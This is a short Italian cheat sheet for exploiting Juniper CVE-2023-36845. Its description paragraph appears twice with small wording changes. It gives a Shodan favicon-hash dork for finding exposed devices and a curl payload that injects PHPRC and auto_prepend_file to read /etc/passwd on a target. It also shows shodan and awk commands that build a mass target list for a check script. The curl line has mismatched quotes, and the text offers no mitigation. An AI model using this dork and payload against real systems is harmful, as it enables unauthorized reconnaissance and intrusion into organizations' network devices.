
Juniper RCE (Esecuzione remota di codice) CVE-2023-36845 è una vulnerabilità identificata nel software di Juniper. Questa particolare falla consente l'esecuzione remota di codice, il che significa che un attaccante potrebbe eseguire codice arbitrario su un sistema senza bisogno di accesso fisico al dispositivo.
Juniper RCE (Remote Code Execution) CVE-2023-36845 è una vulnerabilità identificata nel software Juniper. Questa particolare falla consente l'esecuzione di codice in remoto, il che significa che un attaccante potrebbe eseguire codice arbitrario su un sistema senza bisogno di accesso fisico al dispositivo.
Dork Shodan: http.favicon.hash:2141724739
usare con altri dork pertinenti come certificati SSL, nome dell'organizzazione, ecc. per una ricerca più mirata.
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
